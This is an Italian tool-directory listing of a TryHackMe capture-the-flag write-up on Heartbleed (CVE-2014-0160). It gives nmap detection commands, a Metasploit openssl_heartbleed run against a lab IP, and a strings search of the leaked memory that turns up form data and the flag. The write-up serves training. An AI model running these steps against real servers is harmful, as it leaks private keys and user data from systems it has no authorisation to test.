Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — L'obiettivo di questo progetto era valutare un host remoto per la vulnerabilità Heartbleed (CVE-2014-0160), verificarne la presenza e sfruttarla per estrarre informazioni potenzialmente sensibili dalla memoria del server tramite il protocollo TLS. | Kitploit
Strumenti/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
Memory ForensicsAnalisi delle VulnerabilitàExploitRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

L'obiettivo di questo progetto era valutare un host remoto per la vulnerabilità Heartbleed (CVE-2014-0160), verificarne la presenza e sfruttarla per estrarre informazioni potenzialmente sensibili dalla memoria del server tramite il protocollo TLS.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
61 anno faNon ancora revisionato

Obiettivo L'obiettivo di questo progetto era valutare un host remoto per la vulnerabilità Heartbleed (CVE-2014-0160), verificarne la presenza e sfruttarla per estrarre potenziali informazioni sensibili dalla memoria del server tramite il protocollo TLS.

Esecuzione

  1. Identificazione dei servizi aperti (Nmap) nmap -sC -sV 52.215.184.158 Risultato:

plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 Il certificato TLS era autofirmato e scaduto. Ciò ha fatto sospettare che la versione di OpenSSL potesse essere obsoleta. Porta target: 443.

  1. Verifica della vulnerabilità Heartbleed (Script Nmap) nmap -p 443 --script ssl-heartbleed 52.215.184.158 Risultato:

plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 Il target è confermato vulnerabile a Heartbleed.

  1. Sfruttamento (Metasploit Framework) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run Risultato:

plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin La memoria è stata scaricata con successo e salvata localmente per l'analisi.

  1. Analisi del dump di memoria

strings openssl.heartble_152689.bin | grep -i "THM{" Risultato:

plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} Dati riservati, incluso un flag dell'applicazione, sono stati estratti con successo dalla memoria TLS — confermando che la vulnerabilità può essere sfruttata praticamente per divulgare informazioni sensibili.

Conclusione Ho identificato e sfruttato con successo CVE-2014-0160 su un server remoto. Il processo ha incluso:

Rilevamento della vulnerabilità con nmap

Sfruttamento della falla usando Metasploit

Estrazione di dati utente inviati in tempo reale (incluso il flag THM{sSl-Is-BaD}) dalla memoria

Impatto Aziendale La presenza di Heartbleed in un sistema esposto pubblicamente rappresenta un rischio critico:

Potenziale divulgazione delle chiavi private TLS

Hijacking di sessione

Esposizione di nomi utente, email e input utente sensibili

Scarica lo strumento